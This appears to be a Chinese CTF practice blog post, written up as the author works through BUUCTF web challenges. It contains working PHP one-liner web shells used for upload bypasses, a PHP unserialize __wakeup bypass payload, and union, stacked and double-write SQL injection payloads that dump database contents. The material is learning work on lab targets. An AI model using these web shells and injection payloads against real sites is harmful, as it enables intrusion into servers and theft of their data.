

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="https://t13mk.github.io/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="7bmk">
  <meta name="keywords" content="">
  
    <meta name="description" content="webhttp 极客大挑战 (8要乱改包)进去后是个静态网站，完全没处下手，想起之前”观光”的比赛里的web题也是这个样子，就是这种看着有点像真正的渗透，然后转了转发现没啥hint, 就跑路了….  当然这道题也是一样的看完没啥明显的hint(灵视太低看8见…)，于是直接进行1个wp的看 然后事实证明这题很简单，没啥大的技巧，纯签到题 55555555 首先这是个静态网站，所以先翻翻源码看有没有什">
<meta property="og:type" content="article">
<meta property="og:title" content="刷题(0x01)">
<meta property="og:url" content="http://example.com/2022/03/24/%E5%88%B7%E9%A2%98-0x01/index.html">
<meta property="og:site_name">
<meta property="og:description" content="webhttp 极客大挑战 (8要乱改包)进去后是个静态网站，完全没处下手，想起之前”观光”的比赛里的web题也是这个样子，就是这种看着有点像真正的渗透，然后转了转发现没啥hint, 就跑路了….  当然这道题也是一样的看完没啥明显的hint(灵视太低看8见…)，于是直接进行1个wp的看 然后事实证明这题很简单，没啥大的技巧，纯签到题 55555555 首先这是个静态网站，所以先翻翻源码看有没有什">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/%E5%88%B7%E9%A2%98/buuctf(1).png">
<meta property="og:image" content="http://example.com/images/%E5%88%B7%E9%A2%98/%E8%A7%A3%E6%9E%90%E6%9B%BF%E6%8D%A2.png">
<meta property="article:published_time" content="2022-03-24T09:49:04.000Z">
<meta property="article:modified_time" content="2022-04-19T04:42:23.467Z">
<meta property="article:author" content="7bmk">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/images/%E5%88%B7%E9%A2%98/buuctf(1).png">
  
  
  <title>刷题(0x01) - </title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>7bmk</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="刷题(0x01)">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-24 17:49" pubdate>
        March 24, 2022 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      8.7k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      73 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">刷题(0x01)</h1>
            
            <div class="markdown-body">
              <h1 id="web"><a href="#web" class="headerlink" title="web"></a>web</h1><h2 id="http-极客大挑战-8要乱改包"><a href="#http-极客大挑战-8要乱改包" class="headerlink" title="http 极客大挑战 (8要乱改包)"></a>http 极客大挑战 (8要乱改包)</h2><p>进去后是个静态网站，完全没处下手，想起之前”观光”的比赛里的web题也是这个样子，就是这种看着有点像真正的渗透，然后转了转发现没啥hint, 就跑路了….</p>
<p><img src="/images/%E5%88%B7%E9%A2%98/buuctf(1).png" srcset="/img/loading.gif" lazyload></p>
<p>当然这道题也是一样的看完没啥明显的hint(灵视太低看8见…)，于是直接进行1个wp的看</p>
<p>然后事实证明这题很简单，没啥大的技巧，纯签到题 <del>55555555</del></p>
<p>首先这是个静态网站，所以先翻翻源码看有没有什么hint(为什么第一次没发现捏)</p>
<p>在html里搜索”href”关键词，找到一个”Secret.php的文件”</p>
<p>然后接下来是伪造发送包，再依次伪造浏览器、伪造本地ip(X-Forwarded-For)，就这么简单，一开始还没反应过来</p>
<p>从这个题中的收获是: 遇到了抓包发送后迟迟8返回的情况<br>然后迟迟8返回呢？ 原因我记得以前有师傅提起过，好像是删除了某个类似”%0x00”的符号，这个符号的作用是告诉服务器: 我发送的数据发完了，8小心删除这个符号会导致服务器一直等待那个符号，于是就迟迟没有响应</p>
<p>事实证明这是正确的，在重新抓包并小心规范操作后就成功了</p>
<h2 id="Upload-极客大挑战-文件上传漏洞-phtml-文件幻术头"><a href="#Upload-极客大挑战-文件上传漏洞-phtml-文件幻术头" class="headerlink" title="Upload 极客大挑战 (文件上传漏洞)(.phtml+文件幻术头)"></a>Upload 极客大挑战 (文件上传漏洞)(.phtml+文件幻术头)</h2><p>点进去页面是个文件上传页面，只能上传图片(.jpg.png.jpeg)<br>于是进行1个文件上传漏洞的学，配置upload-labs环境，刷题</p>
<p>然后开始操作，先上传1张正常的图片，阔以在burp抓包看到，然后返回显示”Not image!”，可这明明是正常图片….<del>wdnmd</del></p>
<p>然后上传1个.php后缀文件，失败，把后缀改为.jpg，回显: “NO! HACKER! your file included ‘&lt;?’”<br>说明payload里8能含有”&lt;?”，找找payload作业，找到了这个: </p>
<figure class="highlight php"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><pre><code class="hljs php">&lt;script language=<span class="hljs-string">&quot;php&quot;</span>&gt;@eval_r(<span class="hljs-variable">$_POST</span>[sb])&lt;/script&gt; <span class="hljs-comment">//绕过<span class="hljs-meta">&lt;?</span>限制的一句话</span><br>GIF89a? &lt;script language=<span class="hljs-string">&quot;php&quot;</span>&gt;<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-number">1</span>])&lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p>改了payload后再测试，回显: “Don’t lie to me, it’s not image at all!!! “<br>那么就要判断识别机制了，因为上传时后缀名为.jpg，所以排除后缀名检查和MIME检查，那就是看文件头检查了，要用文件幻术头绕过</p>
<p>以为要用010editor制造个图片马什么的，结果原来阔以直接在burp上改包，最前面加个”GIF89a?”就行了</p>
<p>然后后缀8能是.php，不然也会报错，于是阔以改成.phtml(包含php代码的html文件)，然后上传成功，用蚁剑连</p>
<p>至于连接时的路径，一般是upload&#x2F;…</p>
<h2 id="upload-ACTF2020"><a href="#upload-ACTF2020" class="headerlink" title="upload ACTF2020"></a>upload ACTF2020</h2><p>进去后是文件上传页面，1分钟秒杀<br>首先是前端绕过，直接改包就行<br>然后是文件名后缀检查，改成.phtml后缀即可</p>
<h2 id="easy-calc-php字符串解析特性绕过WAF-amp-amp-http走私攻击-附解析替换作业"><a href="#easy-calc-php字符串解析特性绕过WAF-amp-amp-http走私攻击-附解析替换作业" class="headerlink" title="easy calc (php字符串解析特性绕过WAF &amp;&amp; http走私攻击)(附解析替换作业)"></a>easy calc (php字符串解析特性绕过WAF &amp;&amp; http走私攻击)(附解析替换作业)</h2><p>这题考察waf绕过和php字符串解析特性绕过</p>
<p>随便输入个’1+!’，返回: “&gt;You don’t have permission to access &#x2F;calc.php on this server.”<br>于是就没去访问calc.php，但其实是我误解了，没法访问是因为输入了字母，而如果提交的参数合法的话是阔以访问的…</p>
<p>然后偷瞄wp，回来访问calc.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;num&#x27;</span>]))&#123;<br>    show_source(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-variable">$str</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;num&#x27;</span>];<br>        <span class="hljs-variable">$blacklist</span> = [<span class="hljs-string">&#x27; &#x27;</span>, <span class="hljs-string">&#x27;\t&#x27;</span>, <span class="hljs-string">&#x27;\r&#x27;</span>, <span class="hljs-string">&#x27;\n&#x27;</span>,<span class="hljs-string">&#x27;\&#x27;&#x27;</span>, <span class="hljs-string">&#x27;&quot;&#x27;</span>, <span class="hljs-string">&#x27;`&#x27;</span>, <span class="hljs-string">&#x27;\[&#x27;</span>, <span class="hljs-string">&#x27;\]&#x27;</span>,<span class="hljs-string">&#x27;\$&#x27;</span>,<span class="hljs-string">&#x27;\\&#x27;</span>,<span class="hljs-string">&#x27;\^&#x27;</span>];<br>        <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$blacklist</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$blackitem</span>) &#123;<br>                <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">&#x27;/&#x27;</span> . <span class="hljs-variable">$blackitem</span> . <span class="hljs-string">&#x27;/m&#x27;</span>, <span class="hljs-variable">$str</span>)) &#123;<br>                        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;what are you want to do?&quot;</span>);<br>                &#125;<br>        &#125;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-string">&#x27;echo &#x27;</span>.<span class="hljs-variable">$str</span>.<span class="hljs-string">&#x27;;&#x27;</span>);<span class="hljs-comment">//执行 &#x27;echo $str;&#x27;语句</span><br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>黑名单限制，有戏<br>此处只限制了空格等字符，没有限制字符串，但输入字符串却会返回警告(且警告内容8一样)，说明有waf</p>
<p>waf限制只能提交数字，字母会被过滤，但是阔以用php字符串解析特性绕过waf</p>
<h3 id="php字符串解析特性"><a href="#php字符串解析特性" class="headerlink" title="php字符串解析特性"></a>php字符串解析特性</h3><p>php在解析时，需要将所有参数转化为有效变量名，为此它要做2件事: 1、把所有空白字符删除；2、把一些字符转化为下划线(包括空格)<br>为此就阔以提交”&#x2F;? num&#x3D;payload”，此时提交的参数是’ num’，删除空格变为num，就阔以绕过防火墙了<br>然后我试了试，发现失败…原因是要把空格换成%20，然后就提交成功了</p>
<p>然后构造payload，通过scandir()+var_dump()函数查看目录<br>scandir(pram): 列出参数目录下的所有文件\目录(eg:pram&#x3D;’&#x2F;image&#x2F;‘)</p>
<p>但是calc.php限制了’&#x2F;‘，怎么办?<br>可见你白学了，这个阔以用chr(47)绕过aaaaaaaaaaaah</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-function"><span class="hljs-title">scandir</span>(<span class="hljs-title">chr</span>(<span class="hljs-number">47</span>))</span><br></code></pre></td></tr></table></figure>
<p>回显: Array<br>查看Array目录</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs isbl"><span class="hljs-function"><span class="hljs-title">var_dump</span>(<span class="hljs-title">scandir</span>(<span class="hljs-title">chr</span>(<span class="hljs-number">47</span>)))</span><br></code></pre></td></tr></table></figure>
<p>发现f1agg文件，查看</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">var_dump</span>(file_get_contents(chr(<span class="hljs-number">47</span>).chr(<span class="hljs-number">102</span>).chr(<span class="hljs-number">108</span>).chr(<span class="hljs-number">97</span>).chr(<span class="hljs-number">97</span>).chr(<span class="hljs-number">103</span>).chr(<span class="hljs-number">47</span>)))  //注意是&#x27;/f<span class="hljs-number">1</span>aag而<span class="hljs-number">8</span>是f<span class="hljs-number">1</span>aag&#x27;<br></code></pre></td></tr></table></figure>

<h3 id="解析替换作业"><a href="#解析替换作业" class="headerlink" title="解析替换作业"></a>解析替换作业</h3><p><img src="/images/%E5%88%B7%E9%A2%98/%E8%A7%A3%E6%9E%90%E6%9B%BF%E6%8D%A2.png" srcset="/img/loading.gif" lazyload></p>
<h3 id="http走私攻击"><a href="#http走私攻击" class="headerlink" title="http走私攻击"></a>http走私攻击</h3><p>原理:<br>“当我们向代理服务器发送一个比较模糊的HTTP请求时，由于两者服务器的实现方式不同，可能代理服务器认为这是一个HTTP请求，然后将其转发给了后端的源站服务器，但源站服务器经过解析处理后，只认为其中的一部分为正常请求，剩下的那一部分，就算是走私的请求，当该部分对正常用户的请求造成了影响之后，就实现了HTTP走私攻击。”</p>
<p>有点绕，没听懂，总之查阅多方资料后，这是个和http协议\反向代理服务器有关的漏洞</p>
<p>至于具体原理，这个文章讲的8错，贴在这里—-<a target="_blank" rel="noopener" href="https://paper.seebug.org/1048/">链接</a><br>8得8感慨大佬们的脑洞真大…</p>
<p>然后后续学习….感觉这是个挺大的知识点，于是就决定另水一贴</p>
<h2 id="php-极客大挑战2019-网站的备份文件作业-amp-amp-反序化之跳过-wakeup执行"><a href="#php-极客大挑战2019-网站的备份文件作业-amp-amp-反序化之跳过-wakeup执行" class="headerlink" title="php 极客大挑战2019 (网站的备份文件作业 &amp;&amp; 反序化之跳过__wakeup执行)"></a>php 极客大挑战2019 (网站的备份文件作业 &amp;&amp; 反序化之跳过__wakeup执行)</h2><p>操了，忘了网站的备份文件这个知识点: <a target="_blank" rel="noopener" href="http://www.zip是网站的备份文件/">www.zip是网站的备份文件</a></p>
<p>通过这题再学习一下php反序列化漏洞<br>然后根据提示，下载<a target="_blank" rel="noopener" href="http://www.zip文件,查看class.php(这里有个dirsearch的扫网站后台目录脚本阔以用一手)/">www.zip文件，查看class.php(这里有个dirsearch的扫网站后台目录脚本阔以用一手)</a>: </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;flag.php&#x27;</span>;<br>error_reporting(<span class="hljs-number">0</span>);<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Name</span></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$username</span> = <span class="hljs-string">&#x27;nonono&#x27;</span>;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$password</span> = <span class="hljs-string">&#x27;yesyes&#x27;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$username</span>,<span class="hljs-variable">$password</span></span>)</span>&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;username = <span class="hljs-variable">$username</span>;<br>        <span class="hljs-keyword">$this</span>-&gt;password = <span class="hljs-variable">$password</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">$this</span>-&gt;username = <span class="hljs-string">&#x27;guest&#x27;</span>;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;password != <span class="hljs-number">100</span>) &#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;&quot;</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;You name is: &quot;</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-keyword">$this</span>-&gt;username;<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;/br&gt;&quot;</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;You password is: &quot;</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-keyword">$this</span>-&gt;password;<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;/br&gt;&quot;</span>;<br>            <span class="hljs-keyword">die</span>();<br>        &#125;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>-&gt;username === <span class="hljs-string">&#x27;admin&#x27;</span>) &#123;<br>            <span class="hljs-keyword">global</span> <span class="hljs-variable">$flag</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;/br&gt;hello my friend~~&lt;/br&gt;sorry i can&#x27;t give you the flag!&quot;</span>;<br>            <span class="hljs-keyword">die</span>();<br>        &#125;<br>    &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>然后在index.php中有一段php代码，第一次看没看到…</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;class.php&#x27;</span>;<br>    <span class="hljs-variable">$select</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;select&#x27;</span>];<br>    <span class="hljs-variable">$res</span>=unserialize(@<span class="hljs-variable">$select</span>);<br>    <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>然后就阔以大致推测，get传过去的select经反序列化变成的res会被传到class.php中作为$this</p>
<p>做法: 要调用__destruct函数才能显示flag，幸运的是php一般会主动调用这个函数，8需要我们调用<br>然后password要弱等于100，username要等于’admin’，这就有问题了，因为在反序列化时会调用__wake函数，而__wake函数会把username改了</p>
<p>所以就需要绕过这个函数，怎么绕呢? 可以通过改变属性数绕过，原理是: 当序列化字符串中表示对象属性个数的数字值大于真实类中属性的个数时就会跳过__wakeup的执行</p>
<p>所以我们构造payload: O:4:”Name”:3:{s:14:”%00Name%00username”;s:5:”admin”;s:14:”%00Name%00password”;i:100;}<br>注意: 此处的%00是空字符，原因是$password和$username都是私有变量，因此在序列化时就会是这种格式</p>
<h3 id="网站备份后缀作业"><a href="#网站备份后缀作业" class="headerlink" title="网站备份后缀作业"></a>网站备份后缀作业</h3><p>常见的备份文件后缀名： .git .svn .swp .~ .bak .bash_history<br>尝试是否存在index.php的备份。如index.php.bak</p>
<p>但是有了扫目录的脚本后这些就显得很鸡肋啦!!</p>
<h2 id="一些sql注入"><a href="#一些sql注入" class="headerlink" title="一些sql注入"></a>一些sql注入</h2><p>好久没做sql注入了，再来做一下，发现全忘了</p>
<h3 id="SUCTF-2019-EasySQL1-从回显猜测查询语句，并根据查询语句进行拼接"><a href="#SUCTF-2019-EasySQL1-从回显猜测查询语句，并根据查询语句进行拼接" class="headerlink" title="[SUCTF 2019]EasySQL1  (从回显猜测查询语句，并根据查询语句进行拼接)"></a>[SUCTF 2019]EasySQL1  (从回显猜测查询语句，并根据查询语句进行拼接)</h3><p>这里需要根据回显来猜测sql语句</p>
<p>首先，屏蔽了一些关键词: union “ information_schema<br>然后，用单引号无法闭合，且没有错误回显<br>此处可以用堆叠注入<br>query&#x3D;-1;show databases;<br>Array ( [0] &#x3D;&gt; 2 ) Array ( [0] &#x3D;&gt; ctf ) Array ( [0] &#x3D;&gt; ctftraining ) Array ( [0] &#x3D;&gt; information_schema ) Array ( [0] &#x3D;&gt; mysql ) Array ( [0] &#x3D;&gt; performance_schema ) Array ( [0] &#x3D;&gt; test ) </p>
<p>query&#x3D;2;show 0x696e666f726d6174696f6e5f736368656d61<br>Too long.    &#x2F;&#x2F;太长了也会被屏蔽</p>
<p>query&#x3D;-1;show tables;<br>Array ( [0] &#x3D;&gt; -1 ) Array ( [0] &#x3D;&gt; Flag ) </p>
<p>由回显结果可知，用到了函数var_dump()</p>
<p>然后猜测查询语句:<br>$sql &#x3D; “select “.$post[‘query’].”||flag from Flag”;<br>为什么有个||呢？因为在输入数字时回显的都是 Array([0]&#x3D;&gt;2)……</p>
<p>于是就阔以构造payload了:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">1,*<br></code></pre></td></tr></table></figure>

<p>其他解:<br>预期解: 通过修改SQL配置将或运算符||设置为连接符<br>set sql_mode&#x3D;PIPES_AS_CONCAT;<br>payload:<br>1;set sql_mode&#x3D;PIPES_AS_CONCAT;select 1</p>
<p>emmmmmmmm…..</p>
<h3 id="极客大挑战-2019-LoveSQL-踩坑-url码中空格有时是-，有时是-20"><a href="#极客大挑战-2019-LoveSQL-踩坑-url码中空格有时是-，有时是-20" class="headerlink" title="[极客大挑战 2019]LoveSQL (踩坑: url码中空格有时是+，有时是%20)"></a>[极客大挑战 2019]LoveSQL (踩坑: url码中空格有时是+，有时是%20)</h3><p>比较简单，发现表单需要输入用户名和密码，于是猜测查询语句应该是:<br>select * from table1 where username&#x3D;$get[‘username’] and password&#x3D;$get[‘password’];<br>然后尝试闭合，发现怎么也闭合不了???<br>select * from table1 where username&#x3D;’1’ or 1&#x3D;1’ and password&#x3D;$password;</p>
<p>后来发现hackbar真是垃圾….在payload正确的情况下，需要从网页输入框输入内容…否则浏览器里传的单引号、空格都是未转化为url的…<br>比如有些url码里空格是转化为%20，而有些则是转换为 + ，就会导致错误</p>
<p>于是重新从输入框输入….<br>发现是1个”‘;”就能闭合</p>
<p>?password&#x3D;1’ orderby 4<br>Unknown column ‘4’ in ‘order clause’</p>
<p>可以查询3个<br>-1’ union select 1,2,group_concat(database());#<br>Your password is ‘geek’</p>
<p>-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;’geek’;#<br>Your password is ‘geekuser,l0ve1ysq1’</p>
<p>-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’geekuser’;#<br>Your password is ‘id,username,password’</p>
<p>-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;’l0ve1ysq1’;#<br>Your password is ‘id,username,password</p>
<p>嗯…..看来8在表里，再加上网页给的提示: “这群该死的黑客，竟然这么快就找到了我的flag,这次我把它们放在了那个地方，哼哼！”<br>那会在哪呢? 这我也想不到了，该看wp了</p>
<p>嗯….wp看完了，flag就在表里，次奥<br>-1’ union select 1,2,group_concat(username,password) from l0ve1ysq1;#<br>Your password is ‘cl4ywo_tai_nan_le,glzjinglzjin_wants_a_girlfriend,Z4cHAr7zCrbiao_ge_dddd_hm,0xC4m3llinux_chuang_shi_ren,Ayraina_rua_rain,Akkoyan_shi_fu_de_mao_bo_he,fouc5cl4y,fouc5di_2_kuai_fu_ji,fouc5di_3_kuai_fu_ji,fouc5di_4_kuai_fu_ji,fouc5di_5_kuai_fu_ji,fouc5di_6_kuai_fu_ji,fouc5di_7_kuai_fu_ji,fouc5di_8_kuai_fu_ji,leixiaoSyc_san_da_hacker,flagflag{80a14653-2040-4e94-a550-31697e10e968}’</p>
<h3 id="极客大挑战-2019-BabySQL-fuzz爆关键词注意409延时"><a href="#极客大挑战-2019-BabySQL-fuzz爆关键词注意409延时" class="headerlink" title="[极客大挑战 2019]BabySQL (fuzz爆关键词注意409延时)"></a>[极客大挑战 2019]BabySQL (fuzz爆关键词注意409延时)</h3><p>又是用户名加密码模式，还是有回显注入</p>
<p>怎么闭合都是失败，回显的都是<br>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘1,2,3,4,5,6,7,8;#’ and password&#x3D;’456’’ at line 1<br>其实在这里就应该根据报错猜测是什么导致的…<br>wp是通过fuzz爆破关键词，发现order是报错的，于是就发现是双写绕过</p>
<p>知道就好办了:<br>123’ ununionion seselectlect 1,2,3;#</p>
<p>123’ ununionion seselectlect 1,2,database();#<br>Your password is ‘geek’</p>
<p>123’ ununionion seselectlect 1,2,table_names frfromom information_schema.tables;#<br>Table ‘infmation_schema.tables’ doesn’t exist<br>123’ ununionion seselectlect 1,2,table_names frfromom inforormation_schema.tables;#<br>Table ‘infmation_schema.tables’ doesn’t exist<br>这里的information_schema怎么绕过呢? 看来8能用双写，大小写也8行</p>
<p>试试16进制<br>0x696e666f726d6174696f6e5f736368656d612e7461626c6573<br>也8行….</p>
